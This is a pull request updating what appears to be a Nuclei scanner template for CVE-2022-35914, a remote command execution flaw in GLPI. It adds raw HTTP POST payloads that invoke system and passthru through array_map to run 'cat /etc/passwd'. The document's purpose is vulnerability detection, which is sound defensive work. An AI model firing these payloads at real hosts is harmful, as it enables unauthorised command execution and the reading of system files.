### PR TITLE
Updated CVE-2022-35914 template

### DIFF
--- a/http/cves/2022/CVE-2022-35914.yaml
+++ b/http/cves/2022/CVE-2022-35914.yaml
@@ -2,7 +2,7 @@ id: CVE-2022-35914
 
 info:
   name: GLPI <=10.0.2 - Remote Command Execution
-  author: For3stCo1d
+  author: For3stCo1d + sender (github.com/allendemoura)
   severity: critical
   description: |
     GLPI through 10.0.2 is susceptible to remote command execution injection in /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module.
@@ -16,6 +16,9 @@ info:
     - http://www.bioinformatics.org/phplabware/sourceer/sourceer.php?&Sfs=htmLawedTest.php&Sl=.%2Finternal_utilities%2FhtmLawed
     - https://nvd.nist.gov/vuln/detail/CVE-2022-35914
     - https://github.com/glpi-project/glpi/releases
+    - https://senderend.medium.com/pg-practice-box-deep-dive-glpi-c3a1cf1520f8
+    - https://github.com/allendemoura/CVE-2022-35914
+
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -39,6 +42,8 @@ info:
   tags: cve,cve2022,glpi,rce,kev,glpi-project
 variables:
   cmd: "cat+/etc/passwd"
+  execFunc1: "system"
+  execFunc2: "passthru"  
 
 http:
   - raw:
@@ -49,6 +54,22 @@ http:
         Cookie: sid=foo
 
         sid=foo&hhook=exec&text={{cmd}}
+  - raw:
+      - |
+        POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: sid=foo
+
+        sid=foo&text={{execFunc1}}&hfoo={{cmd}}&hhook=array_map
+  - raw:
+      - |
+        POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: sid=foo
+
+        sid=foo&text={{execFunc2}}&hfoo={{cmd}}&hhook=array_map
 
     matchers-condition: and
     matchers:

--- a/http/cves/2022/CVE-2022-35914.yaml
+++ b/http/cves/2022/CVE-2022-35914.yaml
@@ -42,7 +42,7 @@ info:
 variables:
   cmd: "cat+/etc/passwd"
   execFunc1: "system"
-  execFunc2: "passthru"  
+  execFunc2: "passthru"
 
 http:
   - raw:

--- a/http/cves/2022/CVE-2022-35914.yaml
+++ b/http/cves/2022/CVE-2022-35914.yaml
@@ -2,7 +2,7 @@ id: CVE-2022-35914
 
 info:
   name: GLPI <=10.0.2 - Remote Command Execution
-  author: For3stCo1d + sender (github.com/allendemoura)
+  author: For3stCo1d,allendemoura
   severity: critical
   description: |
     GLPI through 10.0.2 is susceptible to remote command execution injection in /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module.

--- a/http/cves/2022/CVE-2022-35914.yaml
+++ b/http/cves/2022/CVE-2022-35914.yaml
@@ -18,7 +18,6 @@ info:
     - https://github.com/glpi-project/glpi/releases
     - https://senderend.medium.com/pg-practice-box-deep-dive-glpi-c3a1cf1520f8
     - https://github.com/allendemoura/CVE-2022-35914
-
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8


### PR DESCRIPTION
### Template / PR Information

- Updated this template with ability to detect this vulnerability on hosts in which PHP's `exec()` function is disabled. These hosts are still exploitable for RCE using a more complex method, see references below for my research and PoC exploit.

- References: 
	- https://senderend.medium.com/pg-practice-box-deep-dive-glpi-c3a1cf1520f8
	- https://github.com/allendemoura/CVE-2022-35914


### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details
Testing on a vulnerable host from OffSec PG Labs (machine name: GLPI), undetected by current template, detected by this updated template:
![image](https://github.com/user-attachments/assets/9ceb7704-a6a1-411c-8770-a33a0ab8e022)

Confirmation of vulnerability with PoC referenced above:
![image](https://github.com/user-attachments/assets/0b4f2322-facf-419e-91b5-1c75b2a55b0e)

